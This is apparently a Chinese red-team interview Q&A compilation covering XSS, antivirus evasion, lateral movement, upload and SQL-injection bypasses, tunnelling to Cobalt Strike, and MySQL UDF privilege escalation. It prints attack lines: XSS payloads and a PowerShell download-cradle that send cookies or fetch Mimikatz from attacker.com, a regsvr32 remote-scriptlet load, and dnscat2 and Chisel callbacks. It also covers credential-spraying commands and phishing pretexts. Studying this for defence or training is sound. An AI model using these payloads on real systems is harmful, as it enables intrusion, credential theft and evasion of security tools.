2025年渗透测试面试题总结-渗透测试红队面试九（题目+回答）

网络安全领域各种资源，学习文档，以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具，欢迎关注。

目录

渗透测试红队面试九

一、XSS 设置 HTTP-Only 如何绕过

二、XSS 攻击手段分类

三、全杀软环境渗透策略

四、内网横向工具与协议

五、Fscan 崩溃处理方案

六、Apache/IIS 解析漏洞

七、PHP 文件上传绕过方式

八、工作组横向权限需求

九、域控查找方法

十、CDN 获取真实 IP

十一、判断邮箱类型

十二、验证真实 IP

十三、不出网机器上线 CS（Cobalt Strike）

十四、代理工具与杀软对抗

十五、免杀技术核心方法

十六、SQL 注入 Bypass 技术

十七、红队 HW 信息收集方式

十八、Whois 收集信息

十九、登录框利用方式

二十、Python/PHP 开发用途

二十一、代码审计思路

二十二、MySQL Getshell 前提

二十三、MySQL.ini 配置参数

二十四、Redis SSRF 内网攻击

二十五、UDF 提权步骤

二十六、安全学习资源推荐

渗透测试红队面试九

二百四十一、xss 设置http-only如何绕过

二百四十二、xss攻击手段有哪些

二百四十三、遇到全是杀软的工作组怎么办

二百四十四、使用什么工具内网横向

二百四十五、fscan扫机器崩了怎么办

二百四十六、apache iis 解析漏洞是什么

二百四十七、php文件上传绕过方式（黑、白名单、解析漏洞）

二百四十八、工作组横向需要用户什么权限

二百四十九、如何查找域控（尽可能多的方式）

二百五十、如何从cdn 真实ip

二百五十一、如何判断邮箱类型

二百五十二、如何确定你拿到的就是真实ip

二百五十三、机器不出网如何上线到cs（不出网的机器是拿到wenshell的机器）

二百五十四、走代理用哪些工具，遇到杀软怎么办

二百五十五、如何免杀

二百五十六、sql注入bypass有哪些（尽可能多说）

二百五十七、平常红队hw信息收集方式有哪些

二百五十八、whois 收集的信息包括哪些

二百五十九、给一个登录框能想到哪些利用方式

二百六十、平常开发经常用python 和php做什么

二百六十一、代码审计的思路是什么

二百六十二、mysql getshell的前提是什么

二百六十三、其中需要mysql.ini 配置参数应该是怎样

二百六十四、redis ssf 如何攻击内网，可以用到哪些协议

二百六十五、说一下udf提权

二百六十六、平常经常在哪些地方学习

一、XSS 设置 HTTP-Only 如何绕过

1. 非 Cookie 窃取路径
   • 直接请求伪造：利用 XSS 构造请求发送敏感数据（如 <img src="http://attacker.com?token=localStorage.getItem('auth')"> ）。
   • DOM 数据提取：读取页面隐藏字段（如 <script>exfil(document.forms[0].password.value)</script> ）。
2. 客户端存储劫持
   • LocalStorage/SessionStorage：通过 JS 遍历存储并外传（需应用存储敏感数据）。
   • IndexedDB 导出：恶意脚本读取数据库内容（如用户历史记录）。
3. 界面钓鱼攻击
   • 伪造登录弹窗诱导用户输入账号密码，劫持后发送至攻击者服务器。

---

二、XSS 攻击手段分类

类型	攻击场景	示例
反射型 XSS	URL 参数未过滤，即时触发	http://victim.com?search=<script>alert(1)</script>
存储型 XSS	恶意脚本持久化存储（如论坛评论）	留言板插入 <img src=x onerror=stealCookie()>
DOM 型 XSS	前端渲染漏洞，无需服务端交互	eval(decodeURIComponent(location.hash))
盲打 XSS	攻击后台管理界面（如日志面板）	插入 <script>fetch('http://attacker.com?cookie='+document.cookie)</script>
mXSS	富文本编辑器过滤逻辑绕过	<a href="javascript:alert(1)">Click</a>

---

三、全杀软环境渗透策略

1. 无文件攻击
   • PowerShell 内存加载：

     powershellIEX (New-Object Net.WebClient).DownloadString('http://attacker.com/Invoke-Mimikatz.ps1') 

   • WMI 持久化：通过 WMI 事件订阅执行 payload（如 __EventFilter + CommandLineEventConsumer）。
2. 白名单工具滥用
   • MsBuild 执行 C#：将恶意代码编译为临时程序集：

     xml<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> <Target Name="Exec"> <Exec Command="calc.exe" /> </Target> </Project>

   • Regsvr32 加载远程脚本：

     cmregsvr32 /s /n /u /i:http://attacker.com/payload.sct scrobj.dll 

3. 流量隐匿技术
   • 域前置（Domain Fronting）：伪装流量至合法 CDN（如 Google 或 Cloudflare）。
   • HTTP/3 QUIC 协议：利用 UDP 特性规避传统 IDS 检测。

---

四、内网横向工具与协议

工具	功能	典型命令
Impacket	SMB/WMI/LDAP 协议攻击	psexec.py user:password@192.168.1.1
CrackMapExec	自动化凭证喷射与横向移动	cme smb 192.168.1.0/24 -u user -p password
Chisel	多协议隧道穿透	chisel server -p 8080 + chisel client attacker.com:8080 R:445:127.0.0.1:445
Proxychains	代理链流量路由	proxychains nmap -sT 10.10.10.1
Responder	LLMNR/NBT-NS 毒化	responder -I eth0 -wrf

---

五、Fscan 崩溃处理方案

1. 资源优化
   • 分段扫描：拆分 IP 段为 /24 子网（fscan -h 192.168.1.1-255）。
   • 线程控制：限制并发数为 50（-t 50）。
2. 兼容性调整
   • 协议过滤：禁用非常用协议（-noping -nobr）。
   • 日志分析：启用 -debug 模式定位崩溃点（如特定协议解析错误）。
3. 替代方案
   • 切换至 RustScan（高性能端口扫描）：

     bashrustscan -a 192.168.1.1/24 -- -sV -sC 

---

六、Apache/IIS 解析漏洞

1. Apache 漏洞
   • 多后缀解析：.php.jpg 被解析为 PHP（需错误配置 AddHandler）。
   • .htaccess 覆盖：上传文件指定解析规则：

     apacheAddType application/x-httpd-php .jpg 

2. IIS 漏洞
   • 目录解析：/upload/test.asp/logo.jpg 被当作 ASP 执行（IIS 6.0）。
   • 分号截断：file.asp;.jpg 被解析为 ASP（IIS 7.5 以下）。

---

七、PHP 文件上传绕过方式

1. 黑名单绕过
   • 特殊后缀：.phtml, .php7, .phar。
   • 双写绕过：.pphphp → 过滤后变为 .php。
2. 白名单+解析漏洞
   • MIME 类型伪造：修改 Content-Type: image/jpeg。
   • 文件头伪造：添加合法文件头（如 GIF89a）。
3. 服务器配置漏洞
   • 路径拼接截断：filename="test.php .jpg"（空格截断）。
   • 空字节截断（PHP<5.3）：test.php%00.jpg → 保存为 test.php 。

---

八、工作组横向权限需求

1. 管理员权限：用于 PsExec、WMI 远程执行命令。
2. 本地用户凭证：Pass-the-Hash 攻击（需 NTLM 哈希）。
3. 文件共享写入权：上传后门至共享目录（如 \\192.168.1.1\C$\temp\shell.exe ）。

---

九、域控查找方法

1. DNS 查询：

   bashnslookup -type=SRV _ldap._tcp.dc._msdcs.example.com 

2. 命令探测：

   cmdnet group "Domain Controllers" /domain 

3. LDAP 查询：通过端口 389 搜索 (objectCategory=computer) 且 (userAccountControl:1.2.840.113556.1.4.803:=8192)。

---

十、CDN 获取真实 IP

1. 历史 DNS 记录：使用 SecurityTrails 或 DNSDumpster 查询域名解析历史。
2. 子域名探测：mail.example.com 可能未使用 CDN。
3. SSL 证书匹配：通过 Censys 搜索相同证书的 IP。
4. 邮件服务器追踪：触发密码重置邮件，检查邮件头中的 Received 字段。

---

十一、判断邮箱类型

1. MX 记录查询：

   bashdig mx example.com 

   • Exchange：MX 指向 outlook.com 或自建服务器。
   • Google Workspace：MX 记录包含 google.com 。
2. Webmail 特征：
   • Exchange：登录页 URL 包含 /owa。
   • 腾讯企业邮：mail.example.com 跳转至 exmail.qq.com 。

十二、验证真实 IP

1. 全球 Ping 测试：使用 Ping.pe 检测多地响应 IP 是否一致。
2. 端口扫描：真实 IP 可能开放非标准端口（如 22, 3389）。
3. HTTP 头对比：比较 CDN 与真实 IP 的 Server 或 X-Powered-By 头差异。

十三、不出网机器上线 CS（Cobalt Strike）

1. 反向代理隧道

   • 工具：reGeorg、Neo-reGeorg

     bash# 上传 tunnel.jsp 至目标服务器 python neoreg.py generate -k password # 生成隧道脚本 python neoreg.py -k password -u http://victim.com/tunnel.jsp 

   • 流量路由：通过隧道代理将本地端口映射到目标内网。

2. 协议封装穿透

   • ICMP 隧道：使用 ptunnel-ng 将 TCP 流量封装为 ICMP 包。
   • DNS 隧道：通过 dnscat2 实现隐蔽通信：

     bashdnscat2 --dns server=attacker.com,port=53 --secret=key

3. 中间人跳板

   • 利用已控主机作为代理（如通过 socks4a 协议转发流量）。

---

十四、代理工具与杀软对抗

工具	功能	杀软绕过策略
Proxifier	全局流量代理	白名单模式加载合法应用（如 Chrome）
SSHuttle	VPN over SSH	加密流量混淆（如 AES-256-GCM）
Tor	匿名网络路由	桥接节点（obfs4 混淆）
Nginx	反向代理伪装	配置合法域名与 TLS 证书

---

十五、免杀技术核心方法

1. 代码混淆

   • 字符串加密：使用 AES 加密敏感函数名。
   • 控制流平坦化：打乱代码逻辑（如 LLVM-Obfuscator）。

2. 内存加载

   • 反射型 DLL 注入：通过 LoadLibraryA 加载加密 payload。
   • Process Hollowing：替换合法进程内存（如 svchost.exe ）。

3. 反沙箱检测

   • 硬件指纹检查：检测 CPU 核心数、内存大小（沙箱通常配置低）。
   • 延迟执行：休眠 10 分钟后触发 payload。

---

十六、SQL 注入 Bypass 技术

过滤类型	绕过方法	示例 Payload
关键字过滤	内联注释 /*!50000select*/	UNION/*!50000SELECT*/ 1,2,3
空格过滤	使用括号或换行符 %0a	SELECT'1'%0aFROM
引号过滤	十六进制编码 0xHEX	WHERE user=0x61646D696E
WAF 规则	分块传输编码（Chunked HTTP）	将 payload 拆分为多个 chunk 发送
盲注优化	布尔盲注基于时间差 IF(1,SLEEP(5),0)	' OR IF(1,SLEEP(5),0)-- -

---

十七、红队 HW 信息收集方式

1. 被动收集

   • 证书透明度：查询 crt.sh 获取子域名。
   • GitHub 监控：搜索敏感关键词（如 password, api_key）。

2. 主动扫描

   • 资产测绘：使用 FOFA 搜索 title="企业后台"。
   • 端口服务：Masscan 快速扫描全网段开放端口。

3. 社会工程

   • 钓鱼邮件：伪造 HR 通知诱导点击恶意链接。
   • 电话钓鱼：伪装 IT 部门要求提供 VPN 凭据。

---

十八、Whois 收集信息

1. 基础信息

   • 域名注册商、注册日期、过期时间。
   • 管理员姓名、邮箱（如 admin@example.com ）。

2. 网络信息

   • DNS 服务器地址（如 ns1.cloudflare.com ）。
   • IP 地址段归属（如 ASN 号码）。

3. 关联分析

   • 同一注册人关联的其他域名。

---

十九、登录框利用方式

1. 漏洞利用

   • SQL 注入：admin'-- 绕过密码验证。
   • 弱口令爆破：Top 1000 密码字典攻击。

2. 逻辑漏洞

   • 密码重置功能绕过（如修改 userid 参数）。
   • 验证码未校验（重放攻击）。

3. 前端攻击

   • 修改 JS 代码禁用客户端验证。

---

二十、Python/PHP 开发用途

语言	典型场景	工具/框架
Python	渗透测试脚本（如爬虫、漏洞扫描）	Scrapy、Requests、SQLMap API
PHP	Web 后门（如一句话木马）	Laravel（伪装正常业务逻辑）

---

二十一、代码审计思路

1. 入口点分析
   • 用户输入点：$_GET, $_POST, 文件上传。
2. 危险函数追踪
   • PHP：system(), eval(), include()。
   • Java：Runtime.exec(), JNDI lookup。
3. 数据流追踪
   • 从输入点到敏感操作（如数据库查询、文件写入）。

---

二十二、MySQL Getshell 前提

1. 权限要求
   • FILE 权限（GRANT FILE ON *.* TO 'user'@'%'）。
2. 写文件路径
   • 确定可写目录（通过 @@secure_file_priv）。
3. Web 目录已知
   • 上传 WebShell 至可通过 URL 访问的路径。

---

二十三、MySQL.ini 配置参数

ini[mysqld] secure_file_priv = "" # 允许导出到任意目录 local_infile = ON # 允许加载本地文件

---

二十四、Redis SSRF 内网攻击

1. 协议利用

   • HTTP：探测内网 Web 服务（redis-cli -h 内网IP -p 80）。
   • Gopher：构造攻击包攻击内网服务（如 FastCGI RCE）。

2. 工具自动化

   • SSRFmap：自动化探测与利用内网漏洞。

---

二十五、UDF 提权步骤

1. 上传共享库
   • 编译恶意 .so 或 .dll 文件（如 lib_mysqludf_sys.so ）。
2. 创建函数

   sqlCREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.so'; 

3. 执行命令

   sqlSELECT sys_eval('whoami');

---

二十六、安全学习资源推荐

1. 平台
   • 漏洞库：CVE Details、Exploit-DB。
   • 社区：Reddit r/netsec、先知社区。
2. 实践平台
   • Hack The Box、TryHackMe。
3. 文献
   • 《内网安全攻防：渗透测试实战指南》（2024版）。